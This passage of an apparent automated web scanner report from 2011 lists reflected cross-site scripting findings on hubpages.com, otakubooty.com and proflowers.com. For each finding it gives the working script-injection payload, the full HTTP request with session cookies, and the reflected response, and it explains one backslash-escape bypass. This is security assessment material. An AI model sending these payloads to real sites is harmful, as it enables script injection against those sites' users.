<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset40bce"><script>alert(1)</script>e3e68d52e9c6e238a/?email=', 'Page not found'); return false;">
...[SNIP]...

2.46. https://hubpages.com/signin/reset/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3ca6"><script>alert(1)</script>e2a9419b373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/reset/?a3ca6"><script>alert(1)</script>e2a9419b373=1 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:59 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset/?a3ca6"><script>alert(1)</script>e2a9419b373=1', 'Reset Your HubPages Password'); return false;">
...[SNIP]...

2.47. http://otakubooty.com/Default.asp [login parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /Default.asp

Issue detail

The value of the login request parameter is copied into an HTML comment. The payload 9773a--><script>alert(1)</script>8fb4053a2af was submitted in the login parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Default.asp HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/Default.asp??a5011%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E76b5e899461=1
Cache-Control: max-age=0
Origin: http://otakubooty.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; password=; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.2.10.1297459802
Content-Length: 29

action=login&login=9773a--><script>alert(1)</script>8fb4053a2af&password=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:29:32 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 32284


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] Logging in via form. username=9773a--><script>alert(1)</script>8fb4053a2af -->

<!-- SUPER SECRET DEBUG OUTPUT [ProcessLoginRS] Login result:
...[SNIP]...

2.48. http://otakubooty.com/Default.asp [login parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /Default.asp

Issue detail

The value of the login request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72e40"><script>alert(1)</script>e1430befcb2e74bb5 was submitted in the login parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /Default.asp?action=login&login=72e40"><script>alert(1)</script>e1430befcb2e74bb5&password= HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/Default.asp??a5011%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E76b5e899461=1
Cache-Control: max-age=0
Origin: http://otakubooty.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; password=; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.2.10.1297459802

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:29:32 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 35320


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...
<a href="/Default.asp?action=login&amp;login=72e40"><script>alert(1)</script>e1430befcb2e74bb5&amp;password=&amp;fa=nf">
...[SNIP]...

2.49. http://otakubooty.com/Default.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /Default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5011"><script>alert(1)</script>76b5e899461 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Default.asp??a5011"><script>alert(1)</script>76b5e899461=1 HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 19:29:47 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Set-Cookie: ASPSESSIONIDASBCQBRR=FELOGNJCMJCBMPLBCMMHHOKN; path=/
Vary: Accept-Encoding
Content-Length: 33857


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...
<a href="/Default.asp??a5011"><script>alert(1)</script>76b5e899461=1&amp;fa=nf">
...[SNIP]...

2.50. http://otakubooty.com/oa.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /oa.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5243f"><script>alert(1)</script>8b6b5d9edb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oa.asp?5243f"><script>alert(1)</script>8b6b5d9edb2=1 HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13331
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->

<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http
...[SNIP]...
<form action="/oa.asp?5243f"><script>alert(1)</script>8b6b5d9edb2=1" method=POST>
...[SNIP]...

2.51. http://otakubooty.com/of.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /of.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1815c"><script>alert(1)</script>41682778012 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /of.asp?1815c"><script>alert(1)</script>41682778012=1 HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 37053
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Gen. Ch
...[SNIP]...
<a href="/of.asp?1815c"><script>alert(1)</script>41682778012=1&amp;fa=nf">
...[SNIP]...

2.52. http://otakubooty.com/otaku_help.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_help.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a456"><script>alert(1)</script>d7ef83a91a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otaku_help.asp?3a456"><script>alert(1)</script>d7ef83a91a7=1 HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:13:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 851287
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Info, H
...[SNIP]...
<a href="/otaku_help.asp?3a456"><script>alert(1)</script>d7ef83a91a7=1&amp;fa=nf">
...[SNIP]...

2.53. http://otakubooty.com/otaku_help.asp [tab parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_help.asp

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 517ef"><script>alert(1)</script>0f370775ea6 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otaku_help.asp?tab=mailpassword517ef"><script>alert(1)</script>0f370775ea6 HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/Default.asp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; password=; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.3.10.1297459802

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:30:02 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 851753


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Info, H
...[SNIP]...
<a href="/otaku_help.asp?tab=mailpassword517ef"><script>alert(1)</script>0f370775ea6&amp;fa=nf">
...[SNIP]...

2.54. http://otakubooty.com/otaku_news.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_news.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ea6"><script>alert(1)</script>6181d9322cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otaku_news.asp?d1ea6"><script>alert(1)</script>6181d9322cf=1 HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 34038
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...
<a href="/otaku_news.asp?d1ea6"><script>alert(1)</script>6181d9322cf=1&amp;fa=nf">
...[SNIP]...

2.55. http://otakubooty.com/otaku_search.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_search.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24821"><script>alert(1)</script>ceffb1b07c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otaku_search.asp?24821"><script>alert(1)</script>ceffb1b07c0=1 HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:11:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 23480
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Find Me
...[SNIP]...
<a href="/otaku_search.asp?24821"><script>alert(1)</script>ceffb1b07c0=1&amp;fa=nf">
...[SNIP]...

2.56. http://otakubooty.com/otaku_signup.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_signup.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b9a5"><script>alert(1)</script>6c4c802194a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otaku_signup.asp?5b9a5"><script>alert(1)</script>6c4c802194a=1 HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/otaku_help.asp?tab=mailpassword
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; password=; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.4.10.1297459802

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:29:44 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 19433


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Join Ot
...[SNIP]...
<a href="/otaku_signup.asp?5b9a5"><script>alert(1)</script>6c4c802194a=1&amp;fa=nf">
...[SNIP]...

2.57. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Red-Roses-30050119

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efbdf\"%3balert(1)//5e820bfb5e was submitted in the ref parameter. This input was echoed as efbdf\\";alert(1)//5e820bfb5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\"%3balert(1)//5e820bfb5e HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=xsbbevdz1a3ssdqbzxeccj03; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:32:14 AM; PRVD=SiteSplitID=72; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253APortals%25253AHIC%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/18-Red-Roses-30050119%25253Fviewpos%25253D2%252526trackingpgroup%25253DHIC%252526ref%25253Dfgvprt%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:40:42 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:40:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:40:43 GMT
Content-Length: 169473


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
s.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30050119","30050119","30050119","428477","72","fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\\";alert(1)//5e820bfb5e","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.58. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Red-Roses-30050119

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f89f\"%3balert(1)//1611fbaf415 was submitted in the trackingpgroup parameter. This input was echoed as 3f89f\\";alert(1)//1611fbaf415 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC3f89f\"%3balert(1)//1611fbaf415&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=xsbbevdz1a3ssdqbzxeccj03; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:32:14 AM; PRVD=SiteSplitID=72; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253APortals%25253AHIC%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/18-Red-Roses-30050119%25253Fviewpos%25253D2%252526trackingpgroup%25253DHIC%252526ref%25253Dfgvprt%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:39:42 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:39:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:39:42 GMT
Content-Length: 165008


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
resx.itemid = "30050119";
resx.qty="1";
resx.price="29.99";
resx.total="";
